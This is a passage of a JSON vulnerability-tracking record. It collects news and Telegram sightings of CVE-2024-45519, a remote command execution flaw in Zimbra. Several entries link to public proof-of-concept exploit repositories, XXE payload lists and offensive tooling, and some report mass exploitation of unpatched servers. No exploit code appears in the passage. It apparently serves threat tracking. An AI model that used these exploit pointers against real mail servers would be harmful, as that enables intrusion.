Flaw\nhttps://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting 
September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in Zimbra's postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T13:28:40.000000Z"}, {"uuid": "1f93d50d-2e61-4b2e-b4bd-93b98c8d58b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8864", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:21.000000Z"}, {"uuid": "56ac5916-1a1e-4506-b444-b531268bb273", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/24042", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! 
\n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:33.000000Z"}, {"uuid": "d34a10d4-104b-41ae-98dd-4a2663178ad6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/InfoSecInsider/23977", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "7598bcc1-5af5-4de4-9335-19feb9130f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/InfoSecInsider/23976", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:07.000000Z"}, {"uuid": "71431c22-8ea8-4169-a8af-961c7b222726", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", 
"author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3783", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:15.000000Z"}, {"uuid": "9a8f3a19-91a8-41d2-8366-4f677ac2c10c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7500", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! 
\n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:21.000000Z"}, {"uuid": "1e6baebe-8452-448c-89a6-d49e4d90651e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3798", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux 
Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:24.000000Z"}, {"uuid": "3050adeb-12ff-4c6e-9e83-3fe54857daeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/softrinx/528", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-30T00:37:28.000000Z"}, {"uuid": "5468fe6a-2af3-41d6-b303-401f4140e8f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/proxy_bar/2279", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-29T11:36:37.000000Z"}, {"uuid": "08144ebe-ee15-4884-a9e4-3c7159ac66e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2294", "content": "\u041c\u044b \u0443\u0436\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u043f\u043e \u043f\u043e\u0432\u043e\u0434\u0443 CVE-2024-45519 - Zimbra\n*\n\u041d\u043e, \u0432\u043e\u0442 \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 Postjournal Exploit + \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u043a\u0430\u043a \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u0441\u0442\u0435\u043d\u0434 \u0447\u0442\u043e \u0431\u044b \u043f\u043e\u0438\u0433\u0440\u0430\u0442\u044c\u0441\u044f \u0441\u043e \u0441\u043f\u043b\u043e\u0438\u0442\u043e\u043c \u0438 
\u0434\u0430\u043b\u0435\u0435 \u043f\u043e\u0432\u044b\u0448\u0430\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 (\u043b\u0438\u0431\u043e \u0432 \u0431\u043e\u043a \u0443\u0445\u043e\u0434\u0438\u0442\u044c)\n*\nzimbra.labo", "creation_timestamp": "2024-10-05T08:14:30.000000Z"}, {"uuid": "9f5ab129-dff9-4459-b305-04f09859b58d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/true_secator/6248", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0442\u0440\u0435\u043d\u0434\u044b \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c.\n\n1. \u0412\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-45519 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043f\u043e\u0447\u0442\u044b postjournal \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 Zimbra Collaboration, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b SMTP.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0441\u0432\u0435\u0442\u0438\u043b\u0438 
\u041f\u043e\u0437\u0438\u0442\u0438\u0432\u044b, \u043f\u043e\u043a\u0430\u0437\u0430\u0432 \u0432\u0438\u0434\u0435\u043e \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2024-45519, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043a\u043e\u0440\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0421yberok \u043d\u0430 \u0441\u0432\u043e\u0438\u0445 \u0440\u0430\u0434\u0430\u0440\u0430\u0445 \u0421\u041a\u0418\u041f\u0410 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u044e\u0442 \u0431\u043e\u043b\u0435\u0435 10\u043a \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0430\u043b\u043b\u044f\u0446\u0438\u0439 Zimbra Collaboration \u0432 \u0420\u0443\u043d\u0435\u0442\u0435, \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u043e\u043b\u0435\u0435 3\u043a \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 IP \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u044e\u0442 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 SMTP \u0438 \u043d\u0435 \u0438\u043c\u0435\u044e\u0442 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439, \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u044f\u0441\u044c \u0440\u0438\u0441\u043a\u0443 \u0430\u0442\u0430\u043a \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c 
CVE-2024-45519.\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u043a\u0440\u0430\u0439\u043d\u0435 \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0435 \u0448\u043b\u044e\u0437\u044b Zimbra Collaboration.\n\n2. \u0410\u0432\u0441\u0442\u0440\u0438\u0439\u0441\u043a\u0430\u044f CyberDanube \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0434\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0418\u0411\u041f-\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 Riello UPS.\n\n\u041a\u0430\u043a \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043d\u0435 \u0441\u043c\u043e\u0433 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u043a\u0430\u0440\u0442\u0435 \u0441\u0432\u044f\u0437\u0438 NetMan 204 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f 
\u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 \u0441\u0438\u0441\u0442\u0435\u043c \u0418\u0411\u041f Riello \u0432 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u0438 \u043a\u0440\u0443\u043f\u043d\u044b\u0435 \u0441\u0435\u0442\u0438.\n\n\u041e\u0434\u043d\u0430 \u0438\u0437 \u043d\u0438\u0445 CVE-2024-8877 - \u044d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SQL-\u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0436\u0443\u0440\u043d\u0430\u043b\u0430.\n\n\u0412\u0442\u043e\u0440\u0430\u044f CVE-2024-8878 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0434\u043b\u044f \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0430\u0440\u043e\u043b\u044f.\n\nCyberDanube \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0430 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 \u0438\u044e\u043d\u0435, \u043e\u0434\u043d\u0430\u043a\u043e Riello \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u0430\u0439\u043c\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u0438, \u0447\u0435\u043c 
\u043e\u0436\u0438\u0434\u0430\u043b\u043e\u0441\u044c.\n\n3. \u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b Bitsight \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u043e\u0446\u0435\u043d\u043a\u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u0440\u043e\u0432\u043d\u0435\u043c\u0435\u0440\u0430\u0445 ATG \u0432 \u0431\u0430\u043a\u0430\u0445, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432 10 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0443 \u043f\u044f\u0442\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 Alisonic, Dover Corp, Franklin Fueling Systems, Maglink \u0438 Omntec, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u0445 \u0441\u0435\u043a\u0442\u043e\u0440\u0430\u0445.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0438\u0437\u0443\u0447\u0438\u043b\u0438 \u0448\u0435\u0441\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c ATG \u043e\u0442 \u043f\u044f\u0442\u0438 \u0440\u0430\u0437\u043d\u044b\u0445 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 10 \u0434\u044b\u0440 (\u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0440\u044f\u0434 0-day), \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0438\u0445 Maglink LX \u0438 LX4, OPW SiteSentinel, Proteus OEL8000, Alisonic Sibylla \u0438 
Franklin TS-550.\n\n\u0421\u0435\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d\u044b \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u0440\u043e\u0432\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438. \u041e\u043d\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438, \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u043c\u0430\u043d\u0434 \u041e\u0421 \u0438 SQL. \u041e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 - \u044d\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 XSS \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438, EoP \u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0447\u0442\u0435\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432.\u00a0\n\n\u0412\u0441\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u043d\u0438\u0445 - \u043f\u043e\u043b\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a 
\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438 \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 DoS \u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430. Bitsight \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u043d\u0430\u043d\u0435\u0441\u0442\u0438 \u0444\u0438\u0437\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0449\u0435\u0440\u0431.\u00a0\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 Bitsight \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0442\u044b\u0441\u044f\u0447\u0438 \u043d\u0435\u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0445 \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 ATG, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0432 \u0421\u0428\u0410 \u0438 \u0415\u0432\u0440\u043e\u043f\u0435, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0430\u044d\u0440\u043e\u043f\u043e\u0440\u0442\u0430\u0445, 
\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u0445, \u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f\u0445 \u0438 \u0432 \u043a\u043e\u043c\u043c\u0443\u043d\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u043b\u0443\u0436\u0431\u0430\u0445.\u00a0\n\n4. \u041a\u0430\u043a \u0438 \u043e\u0436\u0438\u0434\u0430\u043b\u043e\u0441\u044c, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b\u0438 \u043a \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 